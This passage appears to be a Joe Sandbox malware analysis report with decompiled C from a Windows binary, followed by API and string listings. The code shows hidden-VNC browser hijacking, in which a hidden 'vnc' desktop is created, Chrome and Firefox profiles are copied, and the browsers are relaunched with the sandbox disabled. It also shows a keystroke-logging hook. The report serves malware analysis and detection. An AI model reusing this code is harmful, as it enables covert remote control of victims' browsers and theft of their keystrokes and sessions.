Instruction Fuzzy Hash: 10A002F87D6304BFFD7957509E5FF153918A750F16F600544B3456D0C466E52500C629

Uniqueness

Uniqueness Score: -1.00%

Function 01035FEB Relevance: 1.3, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01035FEB(void* __ecx) {
				int _t1;

				_t1 = VirtualFree(__ecx, 0, 0x8000); // executed
				return _t1;
			}

0x01035ff3
0x01035ff9

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 93ff0e2ec22dbe8e54a0aa79cee2dcfc6cba415bcfcd4b37e3f23be504eaa148
Instruction ID: 7e23458fcaeca19853f6e4a7fb1fc7fe40136c20b98e1a06b892ca4e606f10c5
Opcode Fuzzy Hash: 93ff0e2ec22dbe8e54a0aa79cee2dcfc6cba415bcfcd4b37e3f23be504eaa148
Instruction Fuzzy Hash: 6DA002B46D070067ED7457205F8AF053614B740B11F604A447281A80D44AAAA0448B58

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01043695 Relevance: 84.6, APIs: 28, Strings: 20, Instructions: 624
processsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E01043695(void* __ecx, void* __eflags, WCHAR* _a4) {
				WCHAR* _v12;
				int _v16;
				WCHAR* _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				char _v40;
				char _v44;
				struct _SECURITY_ATTRIBUTES* _v50;
				struct _SECURITY_ATTRIBUTES* _v54;
				struct _SECURITY_ATTRIBUTES* _v58;
				struct _SHFILEOPSTRUCTW _v76;
				long _v80;
				struct _PROCESS_INFORMATION _v96;
				struct _PROCESS_INFORMATION _v112;
				struct _STARTUPINFOW _v184;
				struct _STARTUPINFOW _v256;
				short _v776;
				short _v1296;
				WCHAR* _t170;
				WCHAR* _t176;
				void* _t178;
				void* _t179;
				void* _t187;
				void* _t289;
				long _t354;
				WCHAR* _t355;
				void* _t466;
				void* _t467;
				void* _t468;
				void* _t469;
				void* _t470;
				void* _t471;
				signed int _t474;
				void* _t485;
				WCHAR* _t486;
				void* _t491;
				WCHAR* _t494;

				_t354 = 0x44;
				E01031052( &_v184, 0, _t354);
				_v184.cb = _t354;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t170 = L"vnc";
				_v184.lpDesktop = _t170;
				CreateDesktopW(_t170, 0, 0, 0, 0x10000000, 0);
				E01031052( &_v1296, 0, 0x208);
				if(E01033373( &_a4) != 0) {
					_t176 = CharLowerW(PathFindFileNameW(_a4));
					_t355 = _a4;
				} else {
					_v16 = 0x104;
					AssocQueryStringW(0, 2, L"http", L"open",  &_v1296,  &_v16);
					_t176 = CharLowerW(PathFindFileNameW( &_v1296));
					_t355 =  &_v1296;
				}
				_t482 = _t176;
				_v32 = _t355;
				if(E01031144(_t176, L"chrome.exe") != 0) {
					_t178 = E01031144(_t482, L"firefox.exe");
					__eflags = _t178;
					if(_t178 != 0) {
						_t179 = E01031144(_t482, L"iexplore.exe");
						__eflags = _t179;
						_push( &_v96);
						_push( &_v184);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						if(_t179 != 0) {
							CreateProcessW(_a4, ??, ??, ??, ??, ??, ??, ??, ??, ??);
							_t474 = _v96.dwProcessId;
							goto L16;
						}
						CreateProcessW(_t355, ??, ??, ??, ??, ??, ??, ??, ??, ??);
						_push(0xfffffffd);
						goto L14;
					}
					_t187 = E01042155(E010336F7( &_v16, L"firefox.exe"));
					E01035FEB(_v16);
					_t474 = 0xffffffff;
					_push(0x208);
					__eflags = _t187;
					if(_t187 == 0) {
						_push(0);
						_push( &_v776);
						E01031052();
						_t467 = 0x28;
						E01040C8A( &_v20, _t467, __eflags);
						E0103373F( &_v12,  &_v20);
						E01033447( &_v12, __eflags, E010336F7( &_v44, L"\\AppData\\Roaming\\Mozilla\\Firefox\\"));
						E01035FEB(_v44);
						E0103373F( &_v16,  &_v12);
						E0103357C( &_v16, _t467, __eflags, L"profiles.ini");
						GetPrivateProfileStringW(L"Profile0", L"Path", 0,  &_v776, 0x104, _v16);
						E0103357C( &_v12, _t467, __eflags,  &_v776);
						E01033447( &_v12, __eflags, E010336F7( &_v44, L"\\prefs.js"));
						E01035FEB(_v44);
						_t485 = CreateFileW(_v12, 4, 3, 0, 4, 0x80, 0);
						WriteFile(_t485, "user_pref(\"layers.acceleration.disabled\", true);", 0x30,  &_v80, 0);
						CloseHandle(_t485);
						CreateProcessW(_t355, 0, 0, 0, 0, 0, 0, 0,  &_v184,  &_v96);
						E01035FEB(_v16);
						E01035FEB(_v12);
						E01035FEB(_v20);
					} else {
						_push(0);
						_push( &_v776);
						E01031052();
						_t468 = 0x28;
						E01040C8A( &_v16, _t468, __eflags);
						E0103373F( &_v32,  &_v16);
						E01033447( &_v32, __eflags, E010336F7( &_v20, L"\\AppData\\Roaming\\Mozilla\\Firefox\\"));
						E01035FEB(_v20);
						E0103373F( &_v12,  &_v16);
						E01033447( &_v12, __eflags, E010336F7( &_v20, L"\\AppData\\Roaming\\FirefoxBackup"));
						E01035FEB(_v20);
						_t486 = _v12;
						_v76.fFlags = 0x414;
						_v76.hwnd = 0;
						_v76.wFunc = 3;
						_v76.pFrom = _t486;
						_v76.pTo = 0;
						_v58 = 0;
						_v50 = 0;
						_v54 = 0;
						SHFileOperationW( &_v76);
						CreateDirectoryW(_t486, 0);
						E0103373F( &_v36,  &_v32);
						E0103357C( &_v36, _t468, __eflags, L"profiles.ini");
						GetPrivateProfileStringW(L"Profile0", L"Path", 0,  &_v776, 0x104, _v36);
						E0103373F( &_v40,  &_v32);
						E0103357C( &_v40, _t468, __eflags,  &_v776);
						E010336F7( &_v24, L"xcopy.exe /H /Y /E /C ");
						E01033447(E010333D1( &_v24, _t468, __eflags, "\""), __eflags,  &_v40);
						E01033447(E010333D1(E010333D1(E010333D1(_t244, _t468, __eflags, "\""), _t468, __eflags, " "), _t468, __eflags, "\""), __eflags,  &_v12);
						E010333D1(_t249, _t468, __eflags, "\"");
						_t469 = 0x25;
						E01040C8A( &_v20, _t469, __eflags);
						E01033447( &_v20, __eflags, E010336F7( &_v44, L"\\xcopy.exe"));
						E01035FEB(_v44);
						E01031052( &_v256, 0, 0x44);
						CreateProcessW(_v20, _v24, 0, 0, 0, 0x8000000, 0, 0,  &_v256,  &_v112);
						WaitForSingleObject(_v112.hProcess, 0xffffffff);
						E010336F7( &_v28, "\"");
						E01033447(E010333D1(E010333D1(E0103357C( &_v28, _t469, __eflags, _t355), _t469, __eflags, "\""), _t469, __eflags, "-no-remote -profile \""), __eflags,  &_v12);
						E010333D1(_t266, _t469, __eflags, "\"");
						E01033447( &_v12, __eflags, E010336F7( &_v44, L"\\prefs.js"));
						E01035FEB(_v44);
						_t491 = CreateFileW(_v12, 4, 3, 0, 4, 0x80, 0);
						WriteFile(_t491, "user_pref(\"layers.acceleration.disabled\", true);", 0x30,  &_v80, 0);
						CloseHandle(_t491);
						CreateProcessW(_t355, _v28, 0, 0, 0, 0, 0, 0,  &_v184,  &_v96);
						E01035FEB(_v28);
						_v28 = 0;
						E01035FEB(_v20);
						E01035FEB(_v24);
						_v24 = 0;
						E01035FEB(_v40);
						E01035FEB(_v36);
						E01035FEB(_v12);
						E01035FEB(_v32);
						E01035FEB(_v16);
						_t474 = CreateProcessW | 0xffffffff;
					}
					goto L16;
				} else {
					_t289 = E01042155(E010336F7( &_v16, L"chrome.exe"));
					E01035FEB(_v16);
					_t505 = _t289;
					if(_t289 == 0) {
						E010336F7( &_v20, "\"");
						E010333D1(E010333D1(E0103357C( &_v20, _t466, __eflags, _t355), _t466, __eflags, "\""), _t466, __eflags, " --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11");
						CreateProcessW(_t355, _v20, 0, 0, 0, 0, 0, 0,  &_v184,  &_v96);
					} else {
						_t470 = 0x28;
						E01040C8A( &_v20, _t470, _t505);
						E0103373F( &_v40,  &_v20);
						E01033447( &_v40, _t505, E010336F7( &_v16, L"\\AppData\\Local\\Google\\Chrome\\User Data"));
						E01035FEB(_v16);
						E0103373F( &_v12,  &_v20);
						E01033447( &_v12, _t505, E010336F7( &_v16, L"\\AppData\\Local\\GoogleBackup"));
						E01035FEB(_v16);
						_t494 = _v12;
						_v76.fFlags = 0x414;
						_v76.hwnd = 0;
						_v76.wFunc = 3;
						_v76.pFrom = _t494;
						_v76.pTo = 0;
						_v58 = 0;
						_v50 = 0;
						_v54 = 0;
						SHFileOperationW( &_v76);
						CreateDirectoryW(_t494, 0);
						E010336F7( &_v28, L"xcopy.exe /H /Y /E /C ");
						E01033447(E010333D1( &_v28, _t470, _t505, "\""), _t505,  &_v40);
						E01033447(E010333D1(E010333D1(E010333D1(_t315, _t470, _t505, "\""), _t470, _t505, " "), _t470, _t505, "\""), _t505,  &_v12);
						E010333D1(_t320, _t470, _t505, "\"");
						_t471 = 0x25;
						E01040C8A( &_v36, _t471, _t505);
						E01033447( &_v36, _t505, E010336F7( &_v16, L"\\xcopy.exe"));
						E01035FEB(_v16);
						E01031052( &_v256, 0, 0x44);
						CreateProcessW(_v36, _v28, 0, 0, 0, 0x8000000, 0, 0,  &_v256,  &_v112);
						WaitForSingleObject(_v112, 0xffffffff);
						E010336F7( &_v24, "\"");
						E01033447(E010333D1(E010333D1(E0103357C( &_v24, _t471, _t505, _v32), _t471, _t505, "\""), _t471, _t505, " --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir=\""), _t505,  &_v12);
						E010333D1(_t337, _t471, _t505, "\"");
						CreateProcessW(_v32, _v24, 0, 0, 0, 0, 0, 0,  &_v184,  &_v96);
						E01035FEB(_v24);
						_v24 = 0;
						E01035FEB(_v36);
						E01035FEB(_v28);
						_v28 = 0;
						E01035FEB(_t494);
						E01035FEB(_v40);
					}
					E01035FEB(_v20);
					_push(0xfffffffe);
					L14:
					_pop(_t474);
					L16:
					E01035FEB(_a4);
					return _t474;
				}
			}

0x010436a3
0x010436ae
0x010436b5
0x010436c1
0x010436c2
0x010436c3
0x010436c4
0x010436c5
0x010436cc
0x010436dc
0x010436ef
0x01043701
0x0104374e
0x01043754
0x01043703
0x01043706
0x01043722
0x01043736
0x0104373c
0x0104373c
0x01043757
0x01043759
0x0104376b
0x010439df
0x010439e6
0x010439e8
0x01043df2
0x01043df9
0x01043dfe
0x01043e05
0x01043e06
0x01043e07
0x01043e08
0x01043e09
0x01043e0a
0x01043e0b
0x01043e0c
0x01043e0d
0x01043e1e
0x01043e24
0x00000000
0x01043e24
0x01043e10
0x01043e16
0x00000000
0x01043e16
0x010439fd
0x01043a07
0x01043a0c
0x01043a15
0x01043a1a
0x01043a1c
0x01043cdf
0x01043ce0
0x01043ce1
0x01043cee
0x01043cef
0x01043cfb
0x01043d11
0x01043d19
0x01043d25
0x01043d32
0x01043d51
0x01043d61
0x01043d77
0x01043d7f
0x01043d9c
0x01043daa
0x01043db1
0x01043dcc
0x01043dd5
0x01043ddd
0x01043de5
0x01043a22
0x01043a24
0x01043a25
0x01043a26
0x01043a33
0x01043a34
0x01043a40
0x01043a56
0x01043a5e
0x01043a6a
0x01043a80
0x01043a88
0x01043a8d
0x01043a95
0x01043a9d
0x01043aa0
0x01043aa7
0x01043aaa
0x01043aad
0x01043ab0
0x01043ab3
0x01043ab6
0x01043abe
0x01043acb
0x01043ad8
0x01043af7
0x01043b04
0x01043b13
0x01043b20
0x01043b3b
0x01043b64
0x01043b6c
0x01043b73
0x01043b77
0x01043b8d
0x01043b95
0x01043ba6
0x01043bcf
0x01043bd6
0x01043be4
0x01043c12
0x01043c1e
0x01043c34
0x01043c3c
0x01043c5b
0x01043c69
0x01043c70
0x01043c8d
0x01043c92
0x01043c9a
0x01043c9d
0x01043ca5
0x01043cad
0x01043cb0
0x01043cb8
0x01043cc0
0x01043cc8
0x01043cd0
0x01043cd5
0x01043cd5
0x00000000
0x01043771
0x01043780
0x0104378a
0x01043792
0x01043794
0x01043989
0x010439aa
0x010439c4
0x0104379a
0x0104379c
0x0104379d
0x010437a9
0x010437bf
0x010437c7
0x010437d3
0x010437e9
0x010437f1
0x010437f6
0x010437fe
0x01043806
0x01043809
0x01043810
0x01043813
0x01043816
0x01043819
0x0104381c
0x0104381f
0x01043827
0x01043835
0x01043850
0x01043879
0x01043881
0x01043888
0x0104388c
0x010438a2
0x010438aa
0x010438bb
0x010438e4
0x010438eb
0x010438f9
0x01043929
0x01043935
0x01043953
0x01043958
0x01043960
0x01043963
0x0104396b
0x01043972
0x01043975
0x0104397d
0x0104397d
0x010439cd
0x010439d2
0x01043e18
0x01043e18
0x01043e27
0x01043e2a
0x01043e35
0x01043e35

APIs

CreateDesktopW.USER32 ref: 010436DC

Part of subcall function 01033373: lstrlenW.KERNEL32(76B30770,01033758,?,?,?,01042AE3,0104566F,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,0104563F,00000000,76B30770,00000000), ref: 0103337A

AssocQueryStringW.SHLWAPI(00000000,00000002,http,open,?,00000000), ref: 01043722
PathFindFileNameW.SHLWAPI(?,?,?,?,?,?), ref: 0104372F
CreateProcessW.KERNEL32 ref: 010438E4
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?), ref: 010438EB
CreateProcessW.KERNEL32 ref: 01043953
CharLowerW.USER32(00000000,?,?,?,?,?), ref: 01043736

Part of subcall function 01040C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,?,?), ref: 01040CBB

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

Part of subcall function 01033447: lstrcatW.KERNEL32(00000000,76B30770), ref: 01033477

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

PathFindFileNameW.SHLWAPI(00000006,?,?,?,?,?), ref: 01043747
CharLowerW.USER32(00000000,?,?,?,?,?), ref: 0104374E
SHFileOperationW.SHELL32(?,00000000,\AppData\Local\GoogleBackup,?,00000000,\AppData\Local\Google\Chrome\User Data,?,chrome.exe,?,?,?,?,?), ref: 0104381F
CreateDirectoryW.KERNEL32(00000006,00000000,?,?,?,?,?), ref: 01043827

Strings

--no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir=", xrefs: 010438FE
http, xrefs: 0104371A
user_pref("layers.acceleration.disabled", true);, xrefs: 01043C63, 01043DA4
\xcopy.exe, xrefs: 01043891, 01043B7C
Path, xrefs: 01043AED, 01043D47
xcopy.exe /H /Y /E /C , xrefs: 0104382D, 01043B18
\AppData\Roaming\FirefoxBackup, xrefs: 01043A6F
--no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11, xrefs: 0104398E
\AppData\Local\GoogleBackup, xrefs: 010437D8
\prefs.js, xrefs: 01043C23, 01043D66
Profile0, xrefs: 01043AF2, 01043D4C
chrome.exe, xrefs: 0104375C, 01043771
open, xrefs: 01043715
\AppData\Local\Google\Chrome\User Data, xrefs: 010437AE
profiles.ini, xrefs: 01043AD0, 01043D2A
-no-remote -profile ", xrefs: 01043BE9
iexplore.exe, xrefs: 01043DEC
vnc, xrefs: 010436C5, 010436DB
\AppData\Roaming\Mozilla\Firefox\, xrefs: 01043A45, 01043D00
firefox.exe, xrefs: 010439D9, 010439EE

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Create$FilePathlstrlen$CharFindLowerNameProcess$AssocDesktopDirectoryDispatcherExceptionFolderFreeObjectOperationQuerySingleSpecialStringUserVirtualWaitlstrcat
String ID: --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11$ --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="$-no-remote -profile "$Path$Profile0$\AppData\Local\GoogleBackup$\AppData\Local\Google\Chrome\User Data$\AppData\Roaming\FirefoxBackup$\AppData\Roaming\Mozilla\Firefox\$\prefs.js$\xcopy.exe$chrome.exe$firefox.exe$http$iexplore.exe$open$profiles.ini$user_pref("layers.acceleration.disabled", true);$vnc$xcopy.exe /H /Y /E /C
API String ID: 210209566-2122738177
Opcode ID: 9463c0b3a557da4d617261ef69f52cb273100214166bd2706d2484f44d3a72d9
Instruction ID: f304888198938a558e2a07995abbc5207dfd0ef634aeff509f0e0a7774790c4c
Opcode Fuzzy Hash: 9463c0b3a557da4d617261ef69f52cb273100214166bd2706d2484f44d3a72d9
Instruction Fuzzy Hash: ED225EB1E0011AABCB11EBA1DDD5EEEBB7DBFA8700F004169F582AB190DF745A05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0103813A Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 286
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103813A(signed int __ecx, int __edx, long _a4) {
				signed int _v8;
				int _v12;
				short _v24;
				short _v56;
				void* _t21;
				short _t24;
				short _t27;
				void* _t36;
				int _t46;
				signed int _t48;
				WCHAR* _t49;
				WCHAR* _t50;
				long _t57;
				void* _t58;
				short _t59;
				short _t60;
				short _t62;
				short _t63;
				short _t64;
				short _t66;
				short _t67;
				short _t69;
				short _t70;
				short _t71;
				short _t73;
				short _t75;
				short _t77;
				short _t78;
				short _t79;
				signed int _t81;

				_t55 = __edx;
				_t48 = __ecx;
				_t46 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t57 = _a4;
				_t21 = __edx - 0x100;
				if(_t21 == 0 || _t21 == 4) {
					_t58 =  *_t57;
					if(_t58 < 0x27) {
						__eflags = _t58 - 0x40;
						if(_t58 <= 0x40) {
							L21:
							__eflags = _t58 - 0x66;
							if(__eflags > 0) {
								__eflags = _t58 - 0xbc;
								if(__eflags > 0) {
									__eflags = _t58 - 0xdb;
									if(__eflags > 0) {
										_t59 = _t58 - 0xdc;
										__eflags = _t59;
										if(_t59 == 0) {
											_t24 = GetAsyncKeyState(0x10);
											_t49 = "|";
											__eflags = _t24;
											if(__eflags == 0) {
												_t49 = "\\";
											}
											L99:
											E010385CB(_t49, _t55, _t90);
											goto L100;
										}
										_t60 = _t59 - 1;
										__eflags = _t60;
										if(_t60 == 0) {
											_t27 = GetAsyncKeyState(0x10);
											_t50 = "}";
											_t55 = "]";
											L76:
											__eflags = _t27;
											_t49 =  ==  ? _t55 : _t50;
											goto L99;
										}
										__eflags = _t60 - 1;
										if(__eflags == 0) {
											_t27 = GetAsyncKeyState(0x10);
											_t50 = "\"";
											_t55 = "\'";
											goto L76;
										}
										L94:
										GetKeyNameTextW((( *(_t57 + 8) << 8) +  *((intOrPtr*)(_t57 + 4)) << 0x10) + 1,  &_v56, 0xf);
										_t49 =  &_v56;
										goto L99;
									}
									if(__eflags == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "{";
										_t55 = "[";
										goto L76;
									}
									_t62 = _t58 - 0xbd;
									__eflags = _t62;
									if(_t62 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "_";
										_t55 = "-";
										goto L76;
									}
									_t63 = _t62 - 1;
									__eflags = _t63;
									if(_t63 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = ">";
										_t55 = ".";
										goto L76;
									}
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "?";
										_t55 = "/";
										goto L76;
									}
									__eflags = _t64 - 1;
									if(__eflags != 0) {
										goto L94;
									}
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "~";
									_t55 = "`";
									goto L76;
								}
								if(__eflags == 0) {
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "<";
									_t55 = ",";
									goto L76;
								}
								__eflags = _t58 - 0xa3;
								if(_t58 > 0xa3) {
									__eflags = _t58 - 0xa5;
									if(__eflags <= 0) {
										L78:
										_t49 = L"[ALT]";
										goto L99;
									}
									__eflags = _t58 - 0xba;
									if(_t58 == 0xba) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = ":";
										_t55 = ";";
										goto L76;
									}
									__eflags = _t58 - 0xbb;
									if(__eflags != 0) {
										goto L94;
									}
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "+";
									_t55 = "=";
									goto L76;
								}
								__eflags = _t58 - 0xa2;
								if(__eflags >= 0) {
									L71:
									_t49 = L"[CTRL]";
									goto L99;
								}
								__eflags = _t58 - 0x67;
								if(__eflags == 0) {
									_t49 = "7";
									goto L99;
								}
								__eflags = _t58 - 0x68;
								if(__eflags == 0) {
									_t49 = "8";
									goto L99;
								}
								__eflags = _t58 - 0x69;
								if(__eflags == 0) {
									_t49 = "9";
									goto L99;
								}
								__eflags = _t58 - 0xa0 - 1;
								if(__eflags > 0) {
									goto L94;
								}
								goto L100;
							}
							if(__eflags == 0) {
								_t49 = "6";
								goto L99;
							}
							__eflags = _t58 - 0x20;
							if(__eflags > 0) {
								__eflags = _t58 - 0x62;
								if(__eflags > 0) {
									_t66 = _t58 - 0x63;
									__eflags = _t66;
									if(__eflags == 0) {
										_t49 = "3";
										goto L99;
									}
									_t67 = _t66 - 1;
									__eflags = _t67;
									if(__eflags == 0) {
										_t49 = "4";
										goto L99;
									}
									__eflags = _t67 - 1;
									if(__eflags != 0) {
										goto L94;
									}
									_t49 = "5";
									goto L99;
								}
								if(__eflags == 0) {
									_t49 = "2";
									goto L99;
								}
								_t69 = _t58 - 0x2d;
								__eflags = _t69;
								if(__eflags == 0) {
									_t49 = L"[INSERT]";
									goto L99;
								}
								_t70 = _t69 - 1;
								__eflags = _t70;
								if(__eflags == 0) {
									_t49 = L"[DEL]";
									goto L99;
								}
								_t71 = _t70 - 0x32;
								__eflags = _t71;
								if(__eflags == 0) {
									_t49 = "0";
									goto L99;
								}
								__eflags = _t71 - 1;
								if(__eflags != 0) {
									goto L94;
								}
								_t49 = "1";
								goto L99;
							}
							if(__eflags == 0) {
								_t49 = " ";
								goto L99;
							}
							__eflags = _t58 - 0x11;
							if(__eflags > 0) {
								_t73 = _t58 - 0x12;
								__eflags = _t73;
								if(__eflags == 0) {
									goto L78;
								}
								_t75 = _t73;
								__eflags = _t75;
								if(__eflags == 0) {
									_t49 = L"[CAPS]";
									goto L99;
								}
								__eflags = _t75 - 7;
								if(__eflags != 0) {
									goto L94;
								}
								_t49 = L"[ESC]";
								goto L99;
							}
							if(__eflags == 0) {
								goto L71;
							}
							_t77 = _t58 - 8;
							__eflags = _t77;
							if(__eflags == 0) {
								_t49 = L"[BKSP]";
								goto L99;
							}
							_t78 = _t77 - 1;
							__eflags = _t78;
							if(__eflags == 0) {
								_t49 = L"[TAB]";
								goto L99;
							}
							_t79 = _t78 - 4;
							__eflags = _t79;
							if(__eflags == 0) {
								_t49 = L"[ENTER]\r\n";
								goto L99;
							}
							__eflags = _t79 - 3;
							if(__eflags == 0) {
								goto L100;
							}
							goto L94;
						}
						L19:
						__eflags = _t58 - 0x5b;
						if(_t58 >= 0x5b) {
							goto L21;
						}
						_t36 = E010385C0();
						__eflags = GetAsyncKeyState(0x10);
						__eflags = E010385AE(_t48 & 0xffffff00 | GetAsyncKeyState(0x10) != 0x00000000, _t36);
						_t53 =  !=  ? _t58 : _t58 + 0x20;
						wsprintfW( &_v24, L"%c",  !=  ? _t58 : _t58 + 0x20);
						E010385CB( &_v24, _t36, __eflags);
						_t46 = _v8;
						goto L100;
					}
					if(_t58 > 0x40) {
						goto L19;
					}
					if(GetAsyncKeyState(0x10) == 0) {
						wsprintfW( &_v24, L"%c", _t58);
						_t49 =  &_v24;
						goto L99;
					}
					_t81 = _t58 + 0xffffffd0;
					_t90 = _t81 - 9;
					if(_t81 > 9) {
						goto L100;
					}
					switch( *((intOrPtr*)(_t81 * 4 +  &M01038586))) {
						case 0:
							_t49 = ")";
							goto L99;
						case 1:
							__ecx = "!";
							goto L99;
						case 2:
							__ecx = "@";
							goto L99;
						case 3:
							__ecx = "#";
							goto L99;
						case 4:
							__ecx = "$";
							goto L99;
						case 5:
							__ecx = "%";
							goto L99;
						case 6:
							__ecx = "^";
							goto L99;
						case 7:
							__ecx = "&";
							goto L99;
						case 8:
							__ecx = "*";
							goto L99;
						case 9:
							__ecx = "(";
							goto L99;
					}
				} else {
					L100:
					return CallNextHookEx(0, _t46, _v12, _t57);
				}
			}

0x0103813a
0x0103813a
0x01038143
0x01038146
0x01038149
0x0103814d
0x01038150
0x01038155
0x01038160
0x01038165
0x01038213
0x01038216
0x01038264
0x01038264
0x01038267
0x01038387
0x01038389
0x01038460
0x01038462
0x010384f5
0x010384f5
0x010384fb
0x01038556
0x0103855c
0x01038561
0x01038564
0x01038566
0x01038566
0x0103856b
0x0103856b
0x00000000
0x0103856b
0x010384fd
0x010384fd
0x01038500
0x0103853f
0x01038545
0x0103854a
0x0103841e
0x0103841e
0x01038421
0x00000000
0x01038421
0x01038502
0x01038505
0x01038528
0x0103852e
0x01038533
0x00000000
0x01038533
0x01038507
0x0103851b
0x01038521
0x00000000
0x01038521
0x01038468
0x010384e0
0x010384e6
0x010384eb
0x00000000
0x010384eb
0x0103846a
0x0103846a
0x01038470
0x010384c9
0x010384cf
0x010384d4
0x00000000
0x010384d4
0x01038472
0x01038472
0x01038475
0x010384b2
0x010384b8
0x010384bd
0x00000000
0x010384bd
0x01038477
0x01038477
0x0103847a
0x0103849b
0x010384a1
0x010384a6
0x00000000
0x010384a6
0x0103847c
0x0103847f
0x00000000
0x00000000
0x01038487
0x0103848d
0x01038492
0x00000000
0x01038492
0x0103838f
0x01038449
0x0103844f
0x01038454
0x00000000
0x01038454
0x01038395
0x0103839b
0x010383f0
0x010383f6
0x0103843d
0x0103843d
0x00000000
0x0103843d
0x010383f8
0x010383fe
0x0103842b
0x01038431
0x01038436
0x00000000
0x01038436
0x01038400
0x01038406
0x00000000
0x00000000
0x0103840e
0x01038414
0x01038419
0x00000000
0x01038419
0x0103839d
0x010383a3
0x010383e6
0x010383e6
0x00000000
0x010383e6
0x010383a5
0x010383a8
0x010383dc
0x00000000
0x010383dc
0x010383aa
0x010383ad
0x010383d2
0x00000000
0x010383d2
0x010383af
0x010383b2
0x010383c8
0x00000000
0x010383c8
0x010383ba
0x010383bd
0x00000000
0x00000000
0x00000000
0x010383c3
0x0103826d
0x01038378
0x00000000
0x01038378
0x01038273
0x01038276
0x010382f6
0x010382f9
0x01038347
0x01038347
0x0103834a
0x0103836e
0x00000000
0x0103836e
0x0103834c
0x0103834c
0x0103834f
0x01038364
0x00000000
0x01038364
0x01038351
0x01038354
0x00000000
0x00000000
0x0103835a
0x00000000
0x0103835a
0x010382fb
0x0103833d
0x00000000
0x0103833d
0x010382fd
0x010382fd
0x01038300
0x01038333
0x00000000
0x01038333
0x01038302
0x01038302
0x01038305
0x01038329
0x00000000
0x01038329
0x01038307
0x01038307
0x0103830a
0x0103831f
0x00000000
0x0103831f
0x0103830c
0x0103830f
0x00000000
0x00000000
0x01038315
0x00000000
0x01038315
0x01038278
0x010382ec
0x00000000
0x010382ec
0x0103827a
0x0103827d
0x010382c0
0x010382c0
0x010382c3
0x00000000
0x00000000
0x010382ca
0x010382ca
0x010382cd
0x010382e2
0x00000000
0x010382e2
0x010382cf
0x010382d2
0x00000000
0x00000000
0x010382d8
0x00000000
0x010382d8
0x0103827f
0x00000000
0x00000000
0x01038285
0x01038285
0x01038288
0x010382b6
0x00000000
0x010382b6
0x0103828a
0x0103828a
0x0103828d
0x010382ac
0x00000000
0x010382ac
0x0103828f
0x0103828f
0x01038292
0x010382a2
0x00000000
0x010382a2
0x01038294
0x01038297
